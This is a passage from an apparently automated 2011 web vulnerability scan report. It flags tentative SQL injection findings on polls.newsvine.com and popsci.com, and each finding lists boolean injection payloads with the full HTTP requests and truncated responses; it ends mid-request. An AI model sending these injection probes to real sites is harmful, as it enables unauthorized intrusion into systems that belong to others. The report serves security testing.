<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

1.130. http://www.polls.newsvine.com/_static/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/_static/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20335452'%20or%201%3d1--%20 and 20335452'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_static20335452'%20or%201%3d1--%20/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:24 GMT
Content-Length: 15052
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=1588555597&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=1588555597&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

Request 2

GET /_static20335452'%20or%201%3d2--%20/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:24 GMT
Content-Length: 15040
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=79981855&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=79981855&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/_v
...[SNIP]...

1.131. http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11619636'%20or%201%3d1--%20 and 11619636'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_static11619636'%20or%201%3d1--%20/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:03:08 GMT
Content-Length: 15040
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=1745812082&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=1745812082&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

Request 2

GET /_static11619636'%20or%201%3d2--%20/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:03:08 GMT
Content-Length: 15050
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=779034459&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=779034459&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

1.132. http://www.polls.newsvine.com/_vine/search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/_vine/search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14284000%20or%201%3d1--%20 and 14284000%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_vine/search?114284000%20or%201%3d1--%20=1 HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:15:40 GMT
Content-Length: 17462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<div id="pgNBCNV194750050" class="deferview_loadInViewport" data-callback="renderAd" data-divId="pgNBCNV194750050" data-acb="false" data-qs="&PG=NBCNV1&AP=1390&ONECLICK=1" data-fw="728" data-fh="90" ></div>
<script type="text/javascript">
if ((typeof(jQuery) == 'undefined' || typeof(DeferView) == 'undefined') && (typeof(dapMgr) != 'undefined')) {
   dapMgr.enableACB('pgNBCNV194750050', false);
   dapMgr.renderAd('pgNBCNV194750050', '&PG=NBCNV1&AP=1390&ONECLICK=1', 728, 90 );
}
</script>
   </div>

   <div class="conversations">
       <div style="margin: 0;"><img src="http://www.polls.newsvine.com/_vine/images/__/b_conversations.gif" width="57" height="14" style="margin:0 0 6px 0;" alt="Conversation Tracker" /></div>
       <a href="javascript:void(0);" onclick="showTracker('column');" class="conv_column" title="New comments from your Newsvine column"><span id="convColumnDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_column.gif" alt="Your Column" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('comments');" class="conv_elsewhere" title="New comments from articles you have commented on"><span id="convCommentsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_elsewhere.gif" alt="Elsewhere" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('friends');" class="conv_friends" title="New comments from articles your friends have commented on"><span id="convFriendsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_friends.gif" alt="Friends" width="14" height="16" /></a>
   </div>

</div>

<script language="javascript" type="text/javascript">var imgsrc = '?&ad=1:1:81;5::;12:12:47;44::';imgsrc += '&x=0|26&do=newsvine.com&rand=587747336';if (document.referrer) { var refr = escape(document.referrer); imgsrc+='&rf='+refr; }document.write('<img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0"
...[SNIP]...

Request 2

GET /_vine/search?114284000%20or%201%3d2--%20=1 HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:15:40 GMT
Content-Length: 17472
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<div id="pgNBCNV11123326006" class="deferview_loadInViewport" data-callback="renderAd" data-divId="pgNBCNV11123326006" data-acb="false" data-qs="&PG=NBCNV1&AP=1390&ONECLICK=1" data-fw="728" data-fh="90" ></div>
<script type="text/javascript">
if ((typeof(jQuery) == 'undefined' || typeof(DeferView) == 'undefined') && (typeof(dapMgr) != 'undefined')) {
   dapMgr.enableACB('pgNBCNV11123326006', false);
   dapMgr.renderAd('pgNBCNV11123326006', '&PG=NBCNV1&AP=1390&ONECLICK=1', 728, 90 );
}
</script>
   </div>

   <div class="conversations">
       <div style="margin: 0;"><img src="http://www.polls.newsvine.com/_vine/images/__/b_conversations.gif" width="57" height="14" style="margin:0 0 6px 0;" alt="Conversation Tracker" /></div>
       <a href="javascript:void(0);" onclick="showTracker('column');" class="conv_column" title="New comments from your Newsvine column"><span id="convColumnDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_column.gif" alt="Your Column" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('comments');" class="conv_elsewhere" title="New comments from articles you have commented on"><span id="convCommentsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_elsewhere.gif" alt="Elsewhere" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('friends');" class="conv_friends" title="New comments from articles your friends have commented on"><span id="convFriendsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_friends.gif" alt="Friends" width="14" height="16" /></a>
   </div>

</div>

<script language="javascript" type="text/javascript">var imgsrc = '?&ad=1:1:81;5::;12:12:47;44::';imgsrc += '&x=0|26&do=newsvine.com&rand=1296215061';if (document.referrer) { var refr = escape(document.referrer); imgsrc+='&rf='+refr; }document.write('<img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" h
...[SNIP]...

1.133. http://www.polls.newsvine.com/environment [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/environment

Issue detail

Request 1

GET /environment?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<div id="pgNBCNV1563085189" class="deferview_loadInViewport" data-callback="renderAd" data-divId="pgNBCNV1563085189" data-acb="false" data-qs="&PG=NBCNV1&AP=1390&ONECLICK=1" data-fw="728" data-fh="90" ></div>
<script type="text/javascript">
if ((typeof(jQuery) == 'undefined' || typeof(DeferView) == 'undefined') && (typeof(dapMgr) != 'undefined')) {
   dapMgr.enableACB('pgNBCNV1563085189', false);
   dapMgr.renderAd('pgNBCNV1563085189', '&PG=NBCNV1&AP=1390&ONECLICK=1', 728, 90 );
}
</script>
   </div>

   <div class="conversations">
       <div style="margin: 0;"><img src="http://www.polls.newsvine.com/_vine/images/__/b_conversations.gif" width="57" height="14" style="margin:0 0 6px 0;" alt="Conversation Tracker" /></div>
       <a href="javascript:void(0);" onclick="showTracker('column');" class="conv_column" title="New comments from your Newsvine column"><span id="convColumnDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_column.gif" alt="Your Column" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('comments');" class="conv_elsewhere" title="New comments from articles you have commented on"><span id="convCommentsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_elsewhere.gif" alt="Elsewhere" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('friends');" class="conv_friends" title="New comments from articles your friends have commented on"><span id="convFriendsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_friends.gif" alt="Friends" width="14" height="16" /></a>
   </div>

</div>

<script language="javascript" type="text/javascript">var imgsrc = '?&ad=40:1:81;5::;12:12:47;41:9:80;44::';imgsrc+= '&get=s2066';imgsrc += '&x=0|26&do=newsvine.com&rand=307281360';if (document.referrer) { var refr = escape(document.referrer); imgsrc+='&rf='+refr; }document.write('<img id="poke" src="http://log.newsvine.com/poke.gif
...[SNIP]...

Request 2

GET /environment?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<div id="pgNBCNV11347823024" class="deferview_loadInViewport" data-callback="renderAd" data-divId="pgNBCNV11347823024" data-acb="false" data-qs="&PG=NBCNV1&AP=1390&ONECLICK=1" data-fw="728" data-fh="90" ></div>
<script type="text/javascript">
if ((typeof(jQuery) == 'undefined' || typeof(DeferView) == 'undefined') && (typeof(dapMgr) != 'undefined')) {
   dapMgr.enableACB('pgNBCNV11347823024', false);
   dapMgr.renderAd('pgNBCNV11347823024', '&PG=NBCNV1&AP=1390&ONECLICK=1', 728, 90 );
}
</script>
   </div>

   <div class="conversations">
       <div style="margin: 0;"><img src="http://www.polls.newsvine.com/_vine/images/__/b_conversations.gif" width="57" height="14" style="margin:0 0 6px 0;" alt="Conversation Tracker" /></div>
       <a href="javascript:void(0);" onclick="showTracker('column');" class="conv_column" title="New comments from your Newsvine column"><span id="convColumnDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_column.gif" alt="Your Column" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('comments');" class="conv_elsewhere" title="New comments from articles you have commented on"><span id="convCommentsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_elsewhere.gif" alt="Elsewhere" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('friends');" class="conv_friends" title="New comments from articles your friends have commented on"><span id="convFriendsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_friends.gif" alt="Friends" width="14" height="16" /></a>
   </div>

</div>

<script language="javascript" type="text/javascript">var imgsrc = '?&ad=40:1:81;5::;12:12:47;41:9:80;44::';imgsrc+= '&get=s2066';imgsrc += '&x=0|26&do=newsvine.com&rand=1895664269';if (document.referrer) { var refr = escape(document.referrer); imgsrc+='&rf='+refr; }document.write('<img id="poke" src="http://log.newsvine.com/pok
...[SNIP]...

1.134. http://www.popsci.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.popsci.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 72683569'%20or%201%3d1--%20 and 72683569'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?172683569'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:23:52 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52; expires=Tue, 22-Feb-2011 06:57:12 GMT; path=/; domain=.popsci.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 03:23:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4c D=414802
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
<a href="http://www.bmxmag.biz/existing.php" style="display: none;">bmxmag-ps</a></div>

<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>
<script>
COMSCORE.beacon({
c1:2,
c2:"6035029",
c3:" ",
c4:" ",
c5:"",
c6:"",
c15:" "
});
</script>
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035029&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
 
<script type="text/javascript">
_qoptions={
qacct:"p-cafODhhaQOlCs"
};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-cafODhhaQOlCs.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>


<script type="text/javascript">
(function () {
var d = new Image(1, 1);
d.onerror = d.onload = function () {
d.onerror = d.onload = null;
};
d.src = ["//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&cg=0&cc=1&si=", escape(window.location.href), "&rp=", escape(document.referrer), "&ts=compact&rnd=", (new Date()).getTime()].join('');
})();
</script>
<noscript>
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
</noscript>

<script language="JavaScript"></script>
<script language="JavaScript" src="/sites/all/modules/omniture/
...[SNIP]...

Request 2

GET /?172683569'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
